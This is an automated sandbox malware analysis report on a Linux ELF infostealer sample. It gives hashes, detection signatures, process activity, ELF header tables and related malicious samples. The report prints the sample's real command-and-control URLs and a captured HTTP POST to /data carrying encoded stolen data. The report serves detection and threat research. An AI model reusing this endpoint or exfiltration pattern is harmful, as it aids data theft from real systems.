Edit tour

Linux Analysis Report
GwRba1mTFR.elf

Overview

General Information

Sample name:GwRba1mTFR.elf
renamed because original name is a hash value
Original sample name:bb02f26fb15341920b092a6c342e1bb2bb7dbb803bd21acc7a8edb3c49fa814e.elf
Analysis ID:1641360
MD5:1657c9d6256ef45abfd7476e6aafe66a
SHA1:f1471df33a7c813c66f1570d1fc253b9d1dc9daf
SHA256:bb02f26fb15341920b092a6c342e1bb2bb7dbb803bd21acc7a8edb3c49fa814e
Tags:elfForceMajeureClauseuser-JAMESWT_MHT
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Executes the "rm" command used to delete files or directories
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1641360
Start date and time:2025-03-18 09:04:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:GwRba1mTFR.elf
renamed because original name is a hash value
Original Sample Name:bb02f26fb15341920b092a6c342e1bb2bb7dbb803bd21acc7a8edb3c49fa814e.elf
Detection:MAL
Classification:mal48.linELF@0/0@0/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • VT rate limit hit for: http://164.92.211.176/
  • VT rate limit hit for: http://164.92.211.176/data
  • VT rate limit hit for: http://164.92.211.176/dataR
  • VT rate limit hit for: http://164.92.211.176/dataindows
Command:/tmp/GwRba1mTFR.elf
PID:6229
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • GwRba1mTFR.elf (PID: 6229, Parent: 6154, MD5: 1657c9d6256ef45abfd7476e6aafe66a) Arguments: /tmp/GwRba1mTFR.elf
  • dash New Fork (PID: 6235, Parent: 4331)
  • rm (PID: 6235, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.1qaSItAQe7 /tmp/tmp.atYAdAIE7L /tmp/tmp.kkt2HvHn2F
  • dash New Fork (PID: 6236, Parent: 4331)
  • rm (PID: 6236, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.1qaSItAQe7 /tmp/tmp.atYAdAIE7L /tmp/tmp.kkt2HvHn2F
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: GwRba1mTFR.elfVirustotal: Detection: 24%Perma Link
Source: GwRba1mTFR.elfReversingLabs: Detection: 33%
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 164.92.211.176
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownHTTP traffic detected: POST /data HTTP/1.1Host: 164.92.211.176User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoContent-Length: 1608Accept-Encoding: gzipConnection: closeData Raw: 59 32 4e 68 4d 54 41 32 4e 6a 51 74 4e 47 51 78 5a 53 30 30 4d 7a 49 79 4c 54 67 77 59 57 45 74 4e 44 5a 6c 59 57 5a 6a 4d 7a 45 33 5a 54 67 35 61 66 32 4d 48 4c 79 64 2b 50 53 4a 56 42 42 76 57 4c 4a 35 63 2f 37 30 64 36 5a 7a 64 41 51 57 78 36 7a 6c 43 4e 57 73 56 53 73 34 69 46 6e 76 56 73 44 37 62 49 37 46 58 4e 4f 36 36 68 64 2f 56 6b 44 73 5a 42 74 52 49 76 5a 4f 38 59 56 41 78 6f 52 34 36 4d 75 6f 59 76 70 2f 6e 61 79 56 59 68 6a 6b 67 43 30 49 4b 64 36 42 68 6d 36 57 73 4e 62 74 37 58 43 4c 7a 72 5a 37 41 4e 68 4c 76 4d 39 44 67 6b 34 4a 6f 55 46 46 38 59 75 6a 2b 36 5a 56 56 54 4a 35 73 65 6b 2b 36 66 53 42 6e 73 30 52 70 36 59 4b 70 62 56 63 66 41 63 6e 33 38 64 49 75 42 39 4d 34 52 68 52 2f 44 63 37 64 6e 6b 68 57 2f 69 45 54 30 45 75 2b 56 54 57 72 75 67 71 71 41 66 67 47 43 46 46 77 4e 67 78 74 6b 54 4e 61 61 31 62 62 65 2b 6d 4a 32 63 71 6c 41 58 54 63 35 62 34 42 31 47 4f 2b 75 53 63 36 70 69 7a 6d 31 65 4a 76 4e 56 72 55 69 41 4a 35 64 51 69 74 6a 4e 4d 63 51 68 30 47 51 75 64 76 74 59 43 32 55 7a 5a 49 33 63 74 6a 45 6e 2b 7a 46 77 56 55 48 69 6a 68 59 6c 41 37 47 7a 47 6d 66 44 4d 4a 61 63 54 50 63 52 36 75 61 61 33 31 59 6d 39 68 4b 43 6e 53 73 31 70 38 56 30 47 4b 69 52 4d 6d 74 56 46 52 4d 6d 44 6f 49 63 57 56 4c 59 49 42 35 4a 2b 4e 79 39 70 65 30 48 32 50 47 38 4f 53 30 45 31 33 41 42 30 61 69 31 6d 30 66 67 32 68 62 56 48 39 6c 53 4d 45 65 42 7a 39 49 57 44 4e 6e 4d 69 36 55 4a 53 57 45 58 36 62 78 4d 49 4b 54 6a 77 57 43 6f 5a 62 6b 58 54 6a 30 63 54 63 4f 35 48 66 67 6b 54 34 39 31 4d 56 77 6a 65 6b 50 6b 6c 44 79 6f 67 56 2b 57 4e 62 38 61 56 73 56 6b 4f 64 70 6d 66 2f 58 43 57 36 46 46 49 79 73 76 77 6e 4e 76 72 61 39 4c 57 38 6a 2b 61 45 5a 4e 61 78 42 56 37 68 42 31 37 2b 41 36 35 63 36 6f 76 72 79 4d 69 58 63 2b 64 30 75 4a 56 66 51 36 53 4e 59 5a 76 55 45 56 69 64 37 4f 45 5a 42 35 4f 68 41 52 39 45 4f 4c 36 32 50 7a 61 41 37 74 42 68 35 5a 32 70 69 70 44 42 64 67 73 6d 43 64 48 4a 53 4f 71 6f 47 4f 4a 2f 5a 56 52 6d 74 49 46 49 42 6d 51 44 4e 30 6a 6d 67 74 51 35 39 36 79 53 6d 73 48 39 34 6d 43 68 4f 4b 6b 4a 46 4d 79 41 2f 39 59 43 78 45 45 6c 55 6f 4a 6b 61 39 79 30 52 76 49 37 36 42 66 58 44 54 52 46 43 4b 67 31 56 78 61 50 69 42 46 72 6a 50 2b 73 70 4c 4f 4c 6b 66 45 4c 31 44 72 4c 69 76 34 46 72 63 68 76 68 6f 37 6e 35 46 2b 43 65 51 56 36 4f 55 53 6d 45 53 72 43 70 75 62 39 41 42 56 48 66 46 54 54 65 41 55 67 42 6b 69 34 76 53 6f 49 4a 66 76 6b 4e 45 6c 73 47 55 75 63 58 36 73 4b 55 46 6f 79 62 4b 55 77 2f 64 4f 69 77 79 31 37 38 49 38 39 6f 43 35 6c 39 6f 44 74 46 52 57 68 6d 6d 34 6d 76 53 59 69 67 61 57 53 6d 6a 65 45 70 33 63 4d 6c 64 77 37 53 61 62 39 53 49 5a 38 45 34 6c 41 53 77 63 66 39 47 4d 62 6b 79 30 68 67 70 61 53 42 4c 6a 73 70 77 6c 64 2b 2f 57 78 76 66 37 67 51 32 34 32 73 78 51 41 4b 65 47 7a 6c 70 52
Source: GwRba1mTFR.elfELF static info symbol of initial sample: freeaddrinfo
Source: GwRba1mTFR.elfELF static info symbol of initial sample: gai_strerror
Source: GwRba1mTFR.elfELF static info symbol of initial sample: getaddrinfo
Source: GwRba1mTFR.elfELF static info symbol of initial sample: getnameinfo
Source: GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://164.92.211.176/
Source: GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://164.92.211.176/164.92.211.176:80164.92.211.176:80Go-http-client/1.1164.92.211.176:80max-age=0
Source: GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://164.92.211.176/data
Source: GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://164.92.211.176/data;
Source: GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://164.92.211.176/dataR
Source: GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://164.92.211.176/dataindows
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/0@0/0
Source: ELF file sectionSubmission: GwRba1mTFR.elf
Source: /usr/bin/dash (PID: 6235)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.1qaSItAQe7 /tmp/tmp.atYAdAIE7L /tmp/tmp.kkt2HvHn2FJump to behavior
Source: /usr/bin/dash (PID: 6236)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.1qaSItAQe7 /tmp/tmp.atYAdAIE7L /tmp/tmp.kkt2HvHn2FJump to behavior
Source: ELF symbol in initial sampleSymbol name: nanosleep
Source: /tmp/GwRba1mTFR.elf (PID: 6229)Queries kernel information via 'uname': Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File Deletion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1641360 Sample: GwRba1mTFR.elf Startdate: 18/03/2025 Architecture: LINUX Score: 48 12 109.202.202.202, 80 INIT7CH Switzerland 2->12 14 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->14 16 3 other IPs or domains 2->16 18 Multi AV Scanner detection for submitted file 2->18 6 dash rm 2->6         started        8 dash rm 2->8         started        10 GwRba1mTFR.elf 2->10         started        signatures3 process4

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
GwRba1mTFR.elf25%VirustotalBrowse
GwRba1mTFR.elf33%ReversingLabsLinux.Infostealer.PoSeidon
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://164.92.211.176/datafalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://164.92.211.176/dataRGwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpfalse
      unknown
      http://164.92.211.176/dataindowsGwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpfalse
        unknown
        http://164.92.211.176/164.92.211.176:80164.92.211.176:80Go-http-client/1.1164.92.211.176:80max-age=0GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpfalse
          unknown
          http://164.92.211.176/data;GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpfalse
            unknown
            http://164.92.211.176/GwRba1mTFR.elf, 6229.1.000000c000000000.000000c000800000.rw-.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              54.171.230.55
              unknownUnited States
              16509AMAZON-02USfalse
              164.92.211.176
              unknownUnited States
              46930ASN-DPSDUSfalse
              109.202.202.202
              unknownSwitzerland
              13030INIT7CHfalse
              91.189.91.43
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              91.189.91.42
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              54.171.230.55na.elfGet hashmaliciousPrometeiBrowse
                na.elfGet hashmaliciousPrometeiBrowse
                  na.elfGet hashmaliciousPrometeiBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                        kaizen.sh4.elfGet hashmaliciousMiraiBrowse
                          sync.x86.elfGet hashmaliciousUnknownBrowse
                            sync.mipsel.elfGet hashmaliciousUnknownBrowse
                              na.elfGet hashmaliciousPrometeiBrowse
                                main_mips.elfGet hashmaliciousMiraiBrowse
                                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                  91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                                    na.elfGet hashmaliciousPrometeiBrowse
                                      na.elfGet hashmaliciousPrometeiBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            na.elfGet hashmaliciousPrometeiBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                                na.elfGet hashmaliciousPrometeiBrowse
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 91.189.91.42
                                                                          ASN-DPSDUShttps://jcmasi.com/jc/s/cnGet hashmaliciousHTMLPhisherBrowse
                                                                          • 164.92.191.209
                                                                          MAdjnpU2Xp.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 164.92.163.239
                                                                          yakov.ppc.elfGet hashmaliciousMiraiBrowse
                                                                          • 164.92.0.31
                                                                          yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 164.94.100.158
                                                                          https://infocorporacion.pe/Kennyiryiio/COCOPOOOUT.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 164.92.93.159
                                                                          telnet.arm.elfGet hashmaliciousUnknownBrowse
                                                                          • 164.92.71.254
                                                                          sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                          • 164.92.178.93
                                                                          RFQ PC25-1301 Product Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                          • 164.92.166.75
                                                                          Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                          • 164.92.178.86
                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 164.94.212.231
                                                                          AMAZON-02USvLqQXoqWDK.exeGet hashmaliciousCredential FlusherBrowse
                                                                          • 52.36.63.191
                                                                          qdS0ohqZBN.exeGet hashmaliciousVidarBrowse
                                                                          • 18.244.18.27
                                                                          5ecf0e.msiGet hashmaliciousNovaSentinelBrowse
                                                                          • 76.223.105.230
                                                                          USD SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                          • 13.248.169.48
                                                                          PRnwwnZ5tc.exeGet hashmaliciousNovaSentinelBrowse
                                                                          • 13.248.169.48
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 44.247.155.67
                                                                          https://check.xemyrai6.icu/gkcxv.google?i=be5d552d-303c-4e59-9dfd-ba549f72437b%20#%20''I%20am%20not%20a%20robot%20-%20%D0%A1%D0%90%D0%A0%D0%A2%D0%A1%D0%9D%D0%90%20Verification%20ID:543195''Get hashmaliciousHTMLPhisherBrowse
                                                                          • 18.245.86.9
                                                                          BlockyRush3.3.3.msiGet hashmaliciousNovaSentinelBrowse
                                                                          • 76.223.105.230
                                                                          5ecf0e.msiGet hashmaliciousNovaSentinelBrowse
                                                                          • 45.112.123.126
                                                                          PRnwwnZ5tc.exeGet hashmaliciousNovaSentinelBrowse
                                                                          • 45.112.123.126
                                                                          INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                          • 109.202.202.202
                                                                          No context
                                                                          No context
                                                                          No created / dropped files found
                                                                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b78637dfa5a6dcc43514289846928b953afdc4f7, for GNU/Linux 3.2.0, stripped
                                                                          Entropy (8bit):6.094698477455092
                                                                          TrID:
                                                                          • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                                                                          • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                                                                          • Lumena CEL bitmap (63/63) 0.78%
                                                                          File name:GwRba1mTFR.elf
                                                                          File size:13'570'600 bytes
                                                                          MD5:1657c9d6256ef45abfd7476e6aafe66a
                                                                          SHA1:f1471df33a7c813c66f1570d1fc253b9d1dc9daf
                                                                          SHA256:bb02f26fb15341920b092a6c342e1bb2bb7dbb803bd21acc7a8edb3c49fa814e
                                                                          SHA512:a39668a27a88a80dbbf339b004daf58058edc215a069022fbfa4bc5a124136540e4cbf30754d3fba3803525fec7c8cf003815c7d746ea3635bb68490513da64d
                                                                          SSDEEP:98304:2yGJ2Z1LGCMAbrySPMUj8ckOEy1Ll4sEQ+6qig:EoT9rPMUjAOEy1LKFQ
                                                                          TLSH:54D63B43E8E60894D8FDC2B485798226EA717C5D0B3A23DB57A1B7342F337E15976B80
                                                                          File Content Preview:.ELF..............>......#@.....@...................@.8...@.".!.........@.......@.@.....@.@...............................................@.......@...............................................@.......@...................................... ....... @....

                                                                          ELF header

                                                                          Class:ELF64
                                                                          Data:2's complement, little endian
                                                                          Version:1 (current)
                                                                          Machine:Advanced Micro Devices X86-64
                                                                          Version Number:0x1
                                                                          Type:EXEC (Executable file)
                                                                          OS/ABI:UNIX - System V
                                                                          ABI Version:0
                                                                          Entry Point Address:0x4023f0
                                                                          Flags:0x0
                                                                          ELF Header Size:64
                                                                          Program Header Offset:64
                                                                          Program Header Size:56
                                                                          Number of Program Headers:12
                                                                          Section Header Offset:13568424
                                                                          Section Header Size:64
                                                                          Number of Section Headers:34
                                                                          Header String Table Index:33
                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                          NULL0x00x00x00x00x0000
                                                                          .interpPROGBITS0x4002e00x2e00x1c0x00x2A001
                                                                          .note.gnu.build-idNOTE0x4002fc0x2fc0x240x00x2A004
                                                                          .note.ABI-tagNOTE0x4003200x3200x200x00x2A004
                                                                          .gnu.hashGNU_HASH0x4003400x3400x340x00x2A508
                                                                          .dynsymDYNSYM0x4003780x3780x6300x180x2A618
                                                                          .dynstrSTRTAB0x4009a80x9a80x3300x00x2A001
                                                                          .gnu.versionVERSYM0x400cd80xcd80x840x20x2A502
                                                                          .gnu.version_rVERNEED0x400d600xd600x700x00x2A638
                                                                          .rela.dynRELA0x400dd00xdd00x480x180x2A508
                                                                          .rela.pltRELA0x400e180xe180x5700x180x42AI5268
                                                                          .initPROGBITS0x4020000x20000x170x00x6AX004
                                                                          .pltPROGBITS0x4020200x20200x3b00x100x6AX0016
                                                                          .textPROGBITS0x4023e00x23e00x82d7110x00x6AX0032
                                                                          .finiPROGBITS0xc2faf40x82faf40x90x00x6AX004
                                                                          .rodataPROGBITS0xc300000x8300000x2160e00x00x2A0032
                                                                          .typelinkPROGBITS0xe460e00xa460e00x38ac0x00x2A0032
                                                                          .itablinkPROGBITS0xe499a00xa499a00xee80x00x2A0032
                                                                          .gopclntabPROGBITS0xe4a8a00xa4a8a00x2540f00x00x2A0032
                                                                          .eh_frame_hdrPROGBITS0x109e9900xc9e9900x1c40x00x2A004
                                                                          .eh_framePROGBITS0x109eb580xc9eb580x8d80x00x2A008
                                                                          .tbssNOBITS0x10a0de80xc9fde80x80x00x403WAT008
                                                                          .init_arrayINIT_ARRAY0x10a0de80xc9fde80x80x80x3WA008
                                                                          .fini_arrayFINI_ARRAY0x10a0df00xc9fdf00x80x80x3WA008
                                                                          .dynamicDYNAMIC0x10a0df80xc9fdf80x1f00x100x3WA608
                                                                          .gotPROGBITS0x10a0fe80xc9ffe80x180x80x3WA008
                                                                          .got.pltPROGBITS0x10a10000xca00000x1e80x80x3WA008
                                                                          .dataPROGBITS0x10a12000xca02000x212800x00x3WA0032
                                                                          .go.buildinfoPROGBITS0x10c24800xcc14800x300x00x3WA0016
                                                                          .noptrdataPROGBITS0x10c24c00xcc14c00x2f3800x00x3WA0032
                                                                          .bssNOBITS0x10f18400xcf08400x252800x00x3WA0032
                                                                          .noptrbssNOBITS0x1116ac00xcf08400x132900x00x3WA0032
                                                                          .commentPROGBITS0x00xcf08400x270x10x30MS001
                                                                          .shstrtabSTRTAB0x00xcf08670x13b0x00x0001
                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                          PHDR0x400x4000400x4000400x2a00x2a02.12010x4R 0x8
                                                                          INTERP0x2e00x4002e00x4002e00x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                                                                          LOAD0x00x4000000x4000000x13880x13882.97380x4R 0x1000.interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt
                                                                          LOAD0x20000x4020000x4020000x82dafd0x82dafd6.24730x5R E0x1000.init .plt .text .fini
                                                                          LOAD0x8300000xc300000xc300000x46f4300x46f4305.22770x4R 0x1000.rodata .typelink .itablink .gopclntab .eh_frame_hdr .eh_frame
                                                                          LOAD0xc9fde80x10a0de80x10a0de80x50a580x88f684.32470x6RW 0x1000.tbss .init_array .fini_array .dynamic .got .got.plt .data .go.buildinfo .noptrdata .bss .noptrbss
                                                                          DYNAMIC0xc9fdf80x10a0df80x10a0df80x1f00x1f01.60580x6RW 0x8.dynamic
                                                                          NOTE0x2fc0x4002fc0x4002fc0x440x443.33780x4R 0x4.note.gnu.build-id .note.ABI-tag
                                                                          TLS0xc9fde80x10a0de80x10a0de80x00x80.00000x4R 0x8.tbss
                                                                          GNU_EH_FRAME0xc9e9900x109e9900x109e9900x1c40x1c44.41310x4R 0x4.eh_frame_hdr
                                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                                          GNU_RELRO0xc9fde80x10a0de80x10a0de80x2180x2181.59620x4R 0x1.tbss .init_array .fini_array .dynamic .got
                                                                          TypeMetaValueTag
                                                                          DT_NEEDEDsharedliblibpthread.so.00x1
                                                                          DT_NEEDEDsharedliblibresolv.so.20x1
                                                                          DT_NEEDEDsharedliblibc.so.60x1
                                                                          DT_INITvalue0x4020000xc
                                                                          DT_FINIvalue0xc2faf40xd
                                                                          DT_INIT_ARRAYvalue0x10a0de80x19
                                                                          DT_INIT_ARRAYSZbytes80x1b
                                                                          DT_FINI_ARRAYvalue0x10a0df00x1a
                                                                          DT_FINI_ARRAYSZbytes80x1c
                                                                          DT_GNU_HASHvalue0x4003400x6ffffef5
                                                                          DT_STRTABvalue0x4009a80x5
                                                                          DT_SYMTABvalue0x4003780x6
                                                                          DT_STRSZbytes8160xa
                                                                          DT_SYMENTbytes240xb
                                                                          DT_DEBUGvalue0x00x15
                                                                          DT_PLTGOTvalue0x10a10000x3
